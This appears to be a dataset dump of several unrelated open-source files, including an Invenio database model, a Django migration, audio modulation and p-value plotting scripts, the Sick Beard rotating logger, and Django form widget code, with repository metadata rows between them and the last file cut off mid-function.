if state == 'present':
kw['state'] = 'present'
if tblspace.new_name:
kw['newname'] = tblspace.new_name
elif state == 'absent':
kw['state'] = 'absent'
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,845,519,248,354,585,000 | 31.047244 | 120 | 0.615602 | false |
inspirehep/invenio-formatter | invenio_formatter/models.py | 1 | 1670 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2013, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Database cache for formatter."""
from invenio_ext.sqlalchemy import db
class Bibfmt(db.Model):
"""Represent a Bibfmt record."""
__tablename__ = 'bibfmt'
id_bibrec = db.Column(
db.MediumInteger(8, unsigned=True),
nullable=False,
server_default='0',
primary_key=True,
autoincrement=False)
format = db.Column(
db.String(10),
nullable=False,
server_default='',
primary_key=True,
index=True)
kind = db.Column(
db.String(10),
nullable=False,
server_default='',
index=True
)
last_updated = db.Column(
db.DateTime,
nullable=False,
server_default='1900-01-01 00:00:00',
index=True)
value = db.Column(db.iLargeBinary)
needs_2nd_pass = db.Column(db.TinyInteger(1), server_default='0')
__all__ = ('Bibfmt', )
| gpl-2.0 | -1,471,349,621,209,438,200 | 26.377049 | 74 | 0.651497 | false |
Wolkabout/WolkConnect-Python- | wolk/models/__init__.py | 1 | 1275 | from .ActuatorCommand import ActuatorCommand
from .ActuatorCommandType import ActuatorCommandType
from .ActuatorState import ActuatorState
from .ActuatorStatus import ActuatorStatus
from .Alarm import Alarm
from .ConfigurationCommand import ConfigurationCommand
from .ConfigurationCommandType import ConfigurationCommandType
from .Device import Device
from .FileTransferPacket import FileTransferPacket
from .FirmwareCommand import FirmwareCommand
from .FirmwareCommandType import FirmwareCommandType
from .FirmwareErrorType import FirmwareErrorType
from .FirmwareStatus import FirmwareStatus
from .FirmwareStatusType import FirmwareStatusType
from .FirmwareUpdateStateType import FirmwareUpdateStateType
from .InboundMessage import InboundMessage
from .OutboundMessage import OutboundMessage
from .SensorReading import SensorReading
__all__ = [
"ActuatorCommand",
"ActuatorCommandType",
"ActuatorState",
"ActuatorStatus",
"Alarm",
"ConfigurationCommand",
"ConfigurationCommandType",
"Device",
"FileTransferPacket",
"FirmwareCommand",
"FirmwareCommandType",
"FirmwareErrorType",
"FirmwareStatus",
"FirmwareStatusType",
"FirmwareUpdateStateType",
"InboundMessage",
"OutboundMessage",
"SensorReading",
]
| apache-2.0 | -2,715,640,380,868,830,000 | 31.692308 | 62 | 0.807059 | false |
Polytechnique-org/xorgauth | xorgauth/accounts/migrations/0012_make_user_names_blank.py | 1 | 1028 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-04 13:41
from __future__ import unicode_literals
from django.db import migrations, models
import xorgauth.utils.fields
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_make_user_ids_blank'),
]
operations = [
migrations.AlterField(
model_name='user',
name='firstname',
field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='first name'),
),
migrations.AlterField(
model_name='user',
name='lastname',
field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='sex',
field=models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female')], max_length=6,
null=True, verbose_name='sex'),
),
]
| agpl-3.0 | 2,887,847,014,832,465,000 | 31.125 | 110 | 0.577821 | false |
Souloist/Audio-Effects | Effects/Amplitude_Modulation/AM_example.py | 1 | 1911 | # Play a wave file with amplitude modulation.
# Assumes wave file is mono.
# This implementation reads and plays a one frame (sample) at a time (no blocking)
"""
Read a signal from a wave file, do amplitude modulation, play to output
Original: pyrecplay_modulation.py by Gerald Schuller, October 2013
Modified to read a wave file - Ivan Selesnick, September 2015
"""
# f0 = 0 # Normal audio
f0 = 400 # 'Duck' audio
import pyaudio
import struct
import wave
import math
# Open wave file (mono)
input_wavefile = 'author.wav'
# input_wavefile = 'sin01_mono.wav'
# input_wavefile = 'sin01_stereo.wav'
wf = wave.open( input_wavefile, 'rb')
RATE = wf.getframerate()
WIDTH = wf.getsampwidth()
LEN = wf.getnframes()
CHANNELS = wf.getnchannels()
print 'The sampling rate is {0:d} samples per second'.format(RATE)
print 'Each sample is {0:d} bytes'.format(WIDTH)
print 'The signal is {0:d} samples long'.format(LEN)
print 'The signal has {0:d} channel(s)'.format(CHANNELS)
# Open audio stream
p = pyaudio.PyAudio()
stream = p.open(format = p.get_format_from_width(WIDTH),
channels = 1,
rate = RATE,
input = False,
output = True)
print('* Playing...')
# Loop through wave file
for n in range(0, LEN):
# Get sample from wave file
input_string = wf.readframes(1)
# Convert binary string to tuple of numbers
input_tuple = struct.unpack('h', input_string)
# (h: two bytes per sample (WIDTH = 2))
# Use first value (of two if stereo)
input_value = input_tuple[0]
# Amplitude modulation (f0 Hz cosine)
output_value = input_value * math.cos(2*math.pi*f0*n/RATE)
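    # Added note (explanatory, not in the original script): multiplying each
    # sample by cos(2*pi*f0*n/RATE) is classic amplitude (ring) modulation.
    # In the frequency domain it shifts every component of the input by +/- f0,
    # i.e. X(f) -> 0.5*[X(f - f0) + X(f + f0)], which is what produces the
    # "duck" sound for f0 = 400 Hz and leaves the audio unchanged for f0 = 0.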
# Convert value to binary string
output_string = struct.pack('h', output_value)
# Write binary string to audio output stream
stream.write(output_string)
print('* Done')
stream.stop_stream()
stream.close()
p.terminate()
| mit | -6,821,632,004,709,263,000 | 26.695652 | 82 | 0.6719 | false |
mattpitkin/GraWIToNStatisticsLectures | figures/scripts/pvalue.py | 1 | 1242 | #!/usr/bin/env python
"""
Make plots showing how to calculate the p-value
"""
import matplotlib.pyplot as pl
from scipy.stats import norm
from scipy.special import erf
import numpy as np
mu = 0. # the mean, mu
sigma = 1. # standard deviation
x = np.linspace(-4, 4, 1000) # x
# set plot to render labels using latex
pl.rc('text', usetex=True)
pl.rc('font', family='serif')
pl.rc('font', size=14)
fig = pl.figure(figsize=(7,4), dpi=100)
# value of x for calculating p-value
Z = 1.233
y = norm.pdf(x, mu, sigma)
# plot pdfs
pl.plot(x, y, 'r')
pl.plot([-Z, -Z], [0., np.max(y)], 'k--')
pl.plot([Z, Z], [0., np.max(y)], 'k--')
pl.fill_between(x, np.zeros(len(x)), y, where=x<=-Z, facecolor='green', interpolate=True, alpha=0.6)
pl.fill_between(x, np.zeros(len(x)), y, where=x>=Z, facecolor='green', interpolate=True, alpha=0.6)
pvalue = 1.-erf(Z/np.sqrt(2.))
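# Added note: for a standard normal test statistic the two-sided p-value is
# P(|Z| >= Z_obs) = 2*(1 - Phi(Z_obs)) = 1 - erf(Z_obs / sqrt(2)),
# which is what the line above computes; for Z_obs = 1.233 this gives ~0.22,
# the probability mass shaded in green in both tails of the plot.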
ax = pl.gca()
ax.set_xlabel('$Z$', fontsize=14)
ax.set_ylabel('$p(Z)$', fontsize=14)
ax.set_xlim(-4, 4)
ax.grid(True)
ax.text(Z+0.1, 0.3, '$Z_{\\textrm{obs}} = 1.233$', fontsize=16)
ax.text(-3.6, 0.31, '$p$-value$= %.2f$' % pvalue, fontsize=18,
bbox={'facecolor': 'none', 'pad':12, 'ec': 'r'})
fig.subplots_adjust(bottom=0.15)
pl.savefig('../pvalue.pdf')
pl.show()
| mit | 2,189,113,514,410,378,800 | 22.884615 | 100 | 0.625604 | false |
mozvip/Sick-Beard | sickbeard/logger.py | 1 | 6374 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import threading
import logging
import sickbeard
from sickbeard import classes
# number of log files to keep
NUM_LOGS = 3
# log size in bytes
LOG_SIZE = 10000000 # 10 megs
ERROR = logging.ERROR
WARNING = logging.WARNING
MESSAGE = logging.INFO
DEBUG = logging.DEBUG
reverseNames = {u'ERROR': ERROR,
u'WARNING': WARNING,
u'INFO': MESSAGE,
u'DEBUG': DEBUG}
class SBRotatingLogHandler(object):
def __init__(self, log_file, num_files, num_bytes):
self.num_files = num_files
self.num_bytes = num_bytes
self.log_file = log_file
self.cur_handler = None
self.writes_since_check = 0
self.log_lock = threading.Lock()
def initLogging(self, consoleLogging=True):
self.log_file = os.path.join(sickbeard.LOG_DIR, self.log_file)
self.cur_handler = self._config_handler()
logging.getLogger('sickbeard').addHandler(self.cur_handler)
logging.getLogger('subliminal').addHandler(self.cur_handler)
# define a Handler which writes INFO messages or higher to the sys.stderr
if consoleLogging:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
console.setFormatter(logging.Formatter('%(asctime)s %(levelname)s::%(message)s', '%H:%M:%S'))
# add the handler to the root logger
logging.getLogger('sickbeard').addHandler(console)
logging.getLogger('subliminal').addHandler(console)
logging.getLogger('sickbeard').setLevel(logging.DEBUG)
logging.getLogger('subliminal').setLevel(logging.ERROR)
def _config_handler(self):
"""
        Configure a file handler that logs to self.log_file and return it.
"""
file_handler = logging.FileHandler(self.log_file)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', '%b-%d %H:%M:%S'))
return file_handler
def _log_file_name(self, i):
"""
        Returns a numbered log file name depending on i. If i == 0 it just uses the base log file name,
        otherwise it appends the number to the extension (blah.log.3 for i == 3)
        i: Log number to use
"""
return self.log_file + ('.' + str(i) if i else '')
def _num_logs(self):
"""
Scans the log folder and figures out how many log files there are already on disk
Returns: The number of the last used file (eg. mylog.log.3 would return 3). If there are no logs it returns -1
"""
cur_log = 0
while os.path.isfile(self._log_file_name(cur_log)):
cur_log += 1
return cur_log - 1
def _rotate_logs(self):
sb_logger = logging.getLogger('sickbeard')
subli_logger = logging.getLogger('subliminal')
# delete the old handler
if self.cur_handler:
self.cur_handler.flush()
self.cur_handler.close()
sb_logger.removeHandler(self.cur_handler)
subli_logger.removeHandler(self.cur_handler)
# rename or delete all the old log files
for i in range(self._num_logs(), -1, -1):
cur_file_name = self._log_file_name(i)
try:
                if i >= self.num_files:
os.remove(cur_file_name)
else:
os.rename(cur_file_name, self._log_file_name(i+1))
            except OSError:  # covers WindowsError on Windows and is defined on all platforms
                pass
# the new log handler will always be on the un-numbered .log file
new_file_handler = self._config_handler()
self.cur_handler = new_file_handler
sb_logger.addHandler(new_file_handler)
subli_logger.addHandler(new_file_handler)
def log(self, toLog, logLevel=MESSAGE):
with self.log_lock:
# check the size and see if we need to rotate
if self.writes_since_check >= 10:
                if os.path.isfile(self.log_file) and os.path.getsize(self.log_file) >= self.num_bytes:
self._rotate_logs()
self.writes_since_check = 0
else:
self.writes_since_check += 1
meThread = threading.currentThread().getName()
message = meThread + u" :: " + toLog
out_line = message.encode('utf-8')
sb_logger = logging.getLogger('sickbeard')
try:
if logLevel == DEBUG:
sb_logger.debug(out_line)
elif logLevel == MESSAGE:
sb_logger.info(out_line)
elif logLevel == WARNING:
sb_logger.warning(out_line)
elif logLevel == ERROR:
sb_logger.error(out_line)
# add errors to the UI logger
classes.ErrorViewer.add(classes.UIError(message))
else:
sb_logger.log(logLevel, out_line)
except ValueError:
pass
sb_log_instance = SBRotatingLogHandler('sickbeard.log', NUM_LOGS, LOG_SIZE)
def log(toLog, logLevel=MESSAGE):
sb_log_instance.log(toLog, logLevel) | gpl-3.0 | -7,407,349,847,844,336,000 | 32.464865 | 118 | 0.568089 | false |
c2corg/v6_api | c2corg_api/search/mappings/image_mapping.py | 1 | 1144 | from c2corg_api.models.image import IMAGE_TYPE, Image
from c2corg_api.search.mapping import SearchDocument, BaseMeta
from c2corg_api.search.mapping_types import QueryableMixin, QEnumArray, \
QInteger, QDate
class SearchImage(SearchDocument):
class Meta(BaseMeta):
doc_type = IMAGE_TYPE
activities = QEnumArray(
'act', model_field=Image.activities)
categories = QEnumArray(
'cat', model_field=Image.categories)
image_type = QEnumArray(
'ityp', model_field=Image.image_type)
elevation = QInteger(
'ialt', range=True)
date_time = QDate('idate', 'date_time')
FIELDS = [
'activities', 'categories', 'image_type', 'elevation', 'date_time'
]
@staticmethod
def to_search_document(document, index):
search_document = SearchDocument.to_search_document(document, index)
if document.redirects_to:
return search_document
SearchDocument.copy_fields(
search_document, document, SearchImage.FIELDS)
return search_document
SearchImage.queryable_fields = QueryableMixin.get_queryable_fields(SearchImage)
| agpl-3.0 | 6,425,518,314,371,161,000 | 29.105263 | 79 | 0.681818 | false |
ar4s/django | django/forms/widgets.py | 1 | 32506 | """
HTML Widget classes
"""
from __future__ import unicode_literals
import copy
from itertools import chain
import warnings
from django.conf import settings
from django.forms.utils import flatatt, to_current_timezone
from django.utils.datastructures import MultiValueDict, MergeDict
from django.utils.html import conditional_escape, format_html
from django.utils.translation import ugettext_lazy
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.safestring import mark_safe
from django.utils import datetime_safe, formats, six
from django.utils.six.moves.urllib.parse import urljoin
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput',
'EmailInput', 'URLInput', 'NumberInput', 'PasswordInput',
'HiddenInput', 'MultipleHiddenInput', 'ClearableFileInput',
'FileInput', 'DateInput', 'DateTimeInput', 'TimeInput', 'Textarea', 'CheckboxInput',
'Select', 'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget',
'SplitDateTimeWidget', 'SplitHiddenDateTimeWidget',
)
MEDIA_TYPES = ('css','js')
@python_2_unicode_compatible
class Media(object):
def __init__(self, media=None, **kwargs):
if media:
media_attrs = media.__dict__
else:
media_attrs = kwargs
self._css = {}
self._js = []
for name in MEDIA_TYPES:
getattr(self, 'add_' + name)(media_attrs.get(name, None))
# Any leftover attributes must be invalid.
# if media_attrs != {}:
# raise TypeError("'class Media' has invalid attribute(s): %s" % ','.join(media_attrs.keys()))
def __str__(self):
return self.render()
def render(self):
return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES])))
def render_js(self):
return [format_html('<script type="text/javascript" src="{0}"></script>', self.absolute_path(path)) for path in self._js]
def render_css(self):
# To keep rendering order consistent, we can't just iterate over items().
# We need to sort the keys, and iterate over the sorted list.
media = sorted(self._css.keys())
return chain(*[
[format_html('<link href="{0}" type="text/css" media="{1}" rel="stylesheet" />', self.absolute_path(path), medium)
for path in self._css[medium]]
for medium in media])
def absolute_path(self, path, prefix=None):
if path.startswith(('http://', 'https://', '/')):
return path
if prefix is None:
if settings.STATIC_URL is None:
# backwards compatibility
prefix = settings.MEDIA_URL
else:
prefix = settings.STATIC_URL
return urljoin(prefix, path)
def __getitem__(self, name):
"Returns a Media object that only contains media of the given type"
if name in MEDIA_TYPES:
return Media(**{str(name): getattr(self, '_' + name)})
raise KeyError('Unknown media type "%s"' % name)
def add_js(self, data):
if data:
for path in data:
if path not in self._js:
self._js.append(path)
def add_css(self, data):
if data:
for medium, paths in data.items():
for path in paths:
if not self._css.get(medium) or path not in self._css[medium]:
self._css.setdefault(medium, []).append(path)
def __add__(self, other):
combined = Media()
for name in MEDIA_TYPES:
getattr(combined, 'add_' + name)(getattr(self, '_' + name, None))
getattr(combined, 'add_' + name)(getattr(other, '_' + name, None))
return combined
def media_property(cls):
def _media(self):
# Get the media property of the superclass, if it exists
sup_cls = super(cls, self)
try:
base = sup_cls.media
except AttributeError:
base = Media()
# Get the media definition for this class
definition = getattr(cls, 'Media', None)
if definition:
extend = getattr(definition, 'extend', True)
if extend:
if extend == True:
m = base
else:
m = Media()
for medium in extend:
m = m + base[medium]
return m + Media(definition)
else:
return Media(definition)
else:
return base
return property(_media)
class MediaDefiningClass(type):
"Metaclass for classes that can have media definitions"
def __new__(cls, name, bases, attrs):
new_class = super(MediaDefiningClass, cls).__new__(cls, name, bases,
attrs)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
@python_2_unicode_compatible
class SubWidget(object):
"""
Some widgets are made of multiple HTML elements -- namely, RadioSelect.
This is a class that represents the "inner" HTML element of a widget.
"""
def __init__(self, parent_widget, name, value, attrs, choices):
self.parent_widget = parent_widget
self.name, self.value = name, value
self.attrs, self.choices = attrs, choices
def __str__(self):
args = [self.name, self.value, self.attrs]
if self.choices:
args.append(self.choices)
return self.parent_widget.render(*args)
class Widget(six.with_metaclass(MediaDefiningClass)):
is_hidden = False # Determines whether this corresponds to an <input type="hidden">.
    needs_multipart_form = False  # Determines whether this widget needs a multipart form
is_localized = False
is_required = False
def __init__(self, attrs=None):
if attrs is not None:
self.attrs = attrs.copy()
else:
self.attrs = {}
def __deepcopy__(self, memo):
obj = copy.copy(self)
obj.attrs = self.attrs.copy()
memo[id(self)] = obj
return obj
def subwidgets(self, name, value, attrs=None, choices=()):
"""
Yields all "subwidgets" of this widget. Used only by RadioSelect to
allow template access to individual <input type="radio"> buttons.
Arguments are the same as for render().
"""
yield SubWidget(self, name, value, attrs, choices)
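        # Illustrative usage (added note, not part of the original source):
        # in a Django template, iterating a RadioSelect-backed bound field,
        # e.g. {% for radio in form.colour %}{{ radio }}{% endfor %} (field
        # name hypothetical), renders one <label>/<input> pair per subwidget.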
def render(self, name, value, attrs=None):
"""
Returns this Widget rendered as HTML, as a Unicode string.
The 'value' given is not guaranteed to be valid input, so subclass
implementations should program defensively.
"""
raise NotImplementedError('subclasses of Widget must provide a render() method')
def build_attrs(self, extra_attrs=None, **kwargs):
"Helper function for building an attribute dictionary."
attrs = dict(self.attrs, **kwargs)
if extra_attrs:
attrs.update(extra_attrs)
return attrs
def value_from_datadict(self, data, files, name):
"""
Given a dictionary of data and this widget's name, returns the value
of this widget. Returns None if it's not provided.
"""
return data.get(name, None)
def id_for_label(self, id_):
"""
Returns the HTML ID attribute of this Widget for use by a <label>,
given the ID of the field. Returns None if no ID is available.
This hook is necessary because some widgets have multiple HTML
elements and, thus, multiple IDs. In that case, this method should
return an ID value that corresponds to the first ID in the widget's
tags.
"""
return id_
class Input(Widget):
"""
Base class for all <input> widgets (except type='checkbox' and
type='radio', which are special).
"""
input_type = None # Subclasses must define this.
def _format_value(self, value):
if self.is_localized:
return formats.localize_input(value)
return value
def render(self, name, value, attrs=None):
if value is None:
value = ''
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
if value != '':
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(self._format_value(value))
return format_html('<input{0} />', flatatt(final_attrs))
class TextInput(Input):
input_type = 'text'
def __init__(self, attrs=None):
if attrs is not None:
self.input_type = attrs.pop('type', self.input_type)
super(TextInput, self).__init__(attrs)
class NumberInput(TextInput):
input_type = 'number'
class EmailInput(TextInput):
input_type = 'email'
class URLInput(TextInput):
input_type = 'url'
class PasswordInput(TextInput):
input_type = 'password'
def __init__(self, attrs=None, render_value=False):
super(PasswordInput, self).__init__(attrs)
self.render_value = render_value
def render(self, name, value, attrs=None):
if not self.render_value: value=None
return super(PasswordInput, self).render(name, value, attrs)
class HiddenInput(Input):
input_type = 'hidden'
is_hidden = True
class MultipleHiddenInput(HiddenInput):
"""
A widget that handles <input type="hidden"> for fields that have a list
of values.
"""
def __init__(self, attrs=None, choices=()):
super(MultipleHiddenInput, self).__init__(attrs)
# choices can be any iterable
self.choices = choices
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
final_attrs = self.build_attrs(attrs, type=self.input_type, name=name)
id_ = final_attrs.get('id', None)
inputs = []
for i, v in enumerate(value):
input_attrs = dict(value=force_text(v), **final_attrs)
if id_:
# An ID attribute was given. Add a numeric index as a suffix
# so that the inputs don't all have the same ID attribute.
input_attrs['id'] = '%s_%s' % (id_, i)
inputs.append(format_html('<input{0} />', flatatt(input_attrs)))
return mark_safe('\n'.join(inputs))
def value_from_datadict(self, data, files, name):
if isinstance(data, (MultiValueDict, MergeDict)):
return data.getlist(name)
return data.get(name, None)
class FileInput(Input):
input_type = 'file'
needs_multipart_form = True
def render(self, name, value, attrs=None):
return super(FileInput, self).render(name, None, attrs=attrs)
def value_from_datadict(self, data, files, name):
"File widgets take data from FILES, not POST"
return files.get(name, None)
FILE_INPUT_CONTRADICTION = object()
class ClearableFileInput(FileInput):
initial_text = ugettext_lazy('Currently')
input_text = ugettext_lazy('Change')
clear_checkbox_label = ugettext_lazy('Clear')
template_with_initial = '%(initial_text)s: %(initial)s %(clear_template)s<br />%(input_text)s: %(input)s'
template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>'
url_markup_template = '<a href="{0}">{1}</a>'
def clear_checkbox_name(self, name):
"""
Given the name of the file input, return the name of the clear checkbox
input.
"""
return name + '-clear'
def clear_checkbox_id(self, name):
"""
Given the name of the clear checkbox input, return the HTML id for it.
"""
return name + '_id'
def render(self, name, value, attrs=None):
substitutions = {
'initial_text': self.initial_text,
'input_text': self.input_text,
'clear_template': '',
'clear_checkbox_label': self.clear_checkbox_label,
}
template = '%(input)s'
substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs)
if value and hasattr(value, "url"):
template = self.template_with_initial
substitutions['initial'] = format_html(self.url_markup_template,
value.url,
force_text(value))
if not self.is_required:
checkbox_name = self.clear_checkbox_name(name)
checkbox_id = self.clear_checkbox_id(checkbox_name)
substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)
substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)
substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})
substitutions['clear_template'] = self.template_with_clear % substitutions
return mark_safe(template % substitutions)
def value_from_datadict(self, data, files, name):
upload = super(ClearableFileInput, self).value_from_datadict(data, files, name)
if not self.is_required and CheckboxInput().value_from_datadict(
data, files, self.clear_checkbox_name(name)):
if upload:
# If the user contradicts themselves (uploads a new file AND
# checks the "clear" checkbox), we return a unique marker
# object that FileField will turn into a ValidationError.
return FILE_INPUT_CONTRADICTION
# False signals to clear any existing value, as opposed to just None
return False
return upload
class Textarea(Widget):
def __init__(self, attrs=None):
# The 'rows' and 'cols' attributes are required for HTML correctness.
default_attrs = {'cols': '40', 'rows': '10'}
if attrs:
default_attrs.update(attrs)
super(Textarea, self).__init__(default_attrs)
def render(self, name, value, attrs=None):
if value is None: value = ''
final_attrs = self.build_attrs(attrs, name=name)
return format_html('<textarea{0}>\r\n{1}</textarea>',
flatatt(final_attrs),
force_text(value))
class DateInput(TextInput):
def __init__(self, attrs=None, format=None):
super(DateInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('DATE_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
value = datetime_safe.new_date(value)
return value.strftime(self.format)
return value
class DateTimeInput(TextInput):
def __init__(self, attrs=None, format=None):
super(DateTimeInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('DATETIME_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
value = datetime_safe.new_datetime(value)
return value.strftime(self.format)
return value
class TimeInput(TextInput):
def __init__(self, attrs=None, format=None):
super(TimeInput, self).__init__(attrs)
if format:
self.format = format
self.manual_format = True
else:
self.format = formats.get_format('TIME_INPUT_FORMATS')[0]
self.manual_format = False
def _format_value(self, value):
if self.is_localized and not self.manual_format:
return formats.localize_input(value)
elif hasattr(value, 'strftime'):
return value.strftime(self.format)
return value
# Defined at module level so that CheckboxInput is picklable (#17976)
def boolean_check(v):
return not (v is False or v is None or v == '')
class CheckboxInput(Widget):
def __init__(self, attrs=None, check_test=None):
super(CheckboxInput, self).__init__(attrs)
# check_test is a callable that takes a value and returns True
# if the checkbox should be checked for that value.
self.check_test = boolean_check if check_test is None else check_test
def render(self, name, value, attrs=None):
final_attrs = self.build_attrs(attrs, type='checkbox', name=name)
if self.check_test(value):
final_attrs['checked'] = 'checked'
if not (value is True or value is False or value is None or value == ''):
# Only add the 'value' attribute if a value is non-empty.
final_attrs['value'] = force_text(value)
return format_html('<input{0} />', flatatt(final_attrs))
def value_from_datadict(self, data, files, name):
if name not in data:
# A missing value means False because HTML form submission does not
# send results for unselected checkboxes.
return False
value = data.get(name)
# Translate true and false strings to boolean values.
values = {'true': True, 'false': False}
if isinstance(value, six.string_types):
value = values.get(value.lower(), value)
return bool(value)
class Select(Widget):
allow_multiple_selected = False
def __init__(self, attrs=None, choices=()):
super(Select, self).__init__(attrs)
# choices can be any iterable, but we may need to render this widget
# multiple times. Thus, collapse it into a list so it can be consumed
# more than once.
self.choices = list(choices)
def render(self, name, value, attrs=None, choices=()):
if value is None: value = ''
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select{0}>', flatatt(final_attrs))]
options = self.render_options(choices, [value])
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def render_option(self, selected_choices, option_value, option_label):
if option_value == None:
option_value = ''
option_value = force_text(option_value)
if option_value in selected_choices:
selected_html = mark_safe(' selected="selected"')
if not self.allow_multiple_selected:
# Only allow for a single selection.
selected_choices.remove(option_value)
else:
selected_html = ''
return format_html('<option value="{0}"{1}>{2}</option>',
option_value,
selected_html,
force_text(option_label))
def render_options(self, choices, selected_choices):
# Normalize to strings.
selected_choices = set(force_text(v) for v in selected_choices)
output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
output.append(format_html('<optgroup label="{0}">', force_text(option_value)))
for option in option_label:
output.append(self.render_option(selected_choices, *option))
output.append('</optgroup>')
else:
output.append(self.render_option(selected_choices, option_value, option_label))
return '\n'.join(output)
class NullBooleanSelect(Select):
"""
A Select Widget intended to be used with NullBooleanField.
"""
def __init__(self, attrs=None):
choices = (('1', ugettext_lazy('Unknown')),
('2', ugettext_lazy('Yes')),
('3', ugettext_lazy('No')))
super(NullBooleanSelect, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
try:
value = {True: '2', False: '3', '2': '2', '3': '3'}[value]
except KeyError:
value = '1'
return super(NullBooleanSelect, self).render(name, value, attrs, choices)
def value_from_datadict(self, data, files, name):
value = data.get(name, None)
return {'2': True,
True: True,
'True': True,
'3': False,
'False': False,
False: False}.get(value, None)
class SelectMultiple(Select):
allow_multiple_selected = True
def render(self, name, value, attrs=None, choices=()):
if value is None: value = []
final_attrs = self.build_attrs(attrs, name=name)
output = [format_html('<select multiple="multiple"{0}>', flatatt(final_attrs))]
options = self.render_options(choices, value)
if options:
output.append(options)
output.append('</select>')
return mark_safe('\n'.join(output))
def value_from_datadict(self, data, files, name):
if isinstance(data, (MultiValueDict, MergeDict)):
return data.getlist(name)
return data.get(name, None)
@python_2_unicode_compatible
class ChoiceInput(SubWidget):
"""
An object used by ChoiceFieldRenderer that represents a single
<input type='$input_type'>.
"""
input_type = None # Subclasses must define this
def __init__(self, name, value, attrs, choice, index):
self.name = name
self.value = value
self.attrs = attrs
self.choice_value = force_text(choice[0])
self.choice_label = force_text(choice[1])
self.index = index
if 'id' in self.attrs:
self.attrs['id'] += "_%d" % self.index
def __str__(self):
return self.render()
def render(self, name=None, value=None, attrs=None, choices=()):
if self.id_for_label:
label_for = format_html(' for="{0}"', self.id_for_label)
else:
label_for = ''
return format_html('<label{0}>{1} {2}</label>', label_for, self.tag(), self.choice_label)
def is_checked(self):
return self.value == self.choice_value
def tag(self):
final_attrs = dict(self.attrs, type=self.input_type, name=self.name, value=self.choice_value)
if self.is_checked():
final_attrs['checked'] = 'checked'
return format_html('<input{0} />', flatatt(final_attrs))
@property
def id_for_label(self):
return self.attrs.get('id', '')
class RadioChoiceInput(ChoiceInput):
input_type = 'radio'
def __init__(self, *args, **kwargs):
super(RadioChoiceInput, self).__init__(*args, **kwargs)
self.value = force_text(self.value)
class RadioInput(RadioChoiceInput):
def __init__(self, *args, **kwargs):
msg = "RadioInput has been deprecated. Use RadioChoiceInput instead."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
super(RadioInput, self).__init__(*args, **kwargs)
class CheckboxChoiceInput(ChoiceInput):
input_type = 'checkbox'
def __init__(self, *args, **kwargs):
super(CheckboxChoiceInput, self).__init__(*args, **kwargs)
self.value = set(force_text(v) for v in self.value)
def is_checked(self):
return self.choice_value in self.value
@python_2_unicode_compatible
class ChoiceFieldRenderer(object):
"""
An object used by RadioSelect to enable customization of radio widgets.
"""
choice_input_class = None
def __init__(self, name, value, attrs, choices):
self.name = name
self.value = value
self.attrs = attrs
self.choices = choices
def __getitem__(self, idx):
        choice = self.choices[idx]  # Let the IndexError propagate
return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx)
def __str__(self):
return self.render()
def render(self):
"""
Outputs a <ul> for this set of choice fields.
If an id was given to the field, it is applied to the <ul> (each
item in the list will get an id of `$id_$i`).
"""
id_ = self.attrs.get('id', None)
start_tag = format_html('<ul id="{0}">', id_) if id_ else '<ul>'
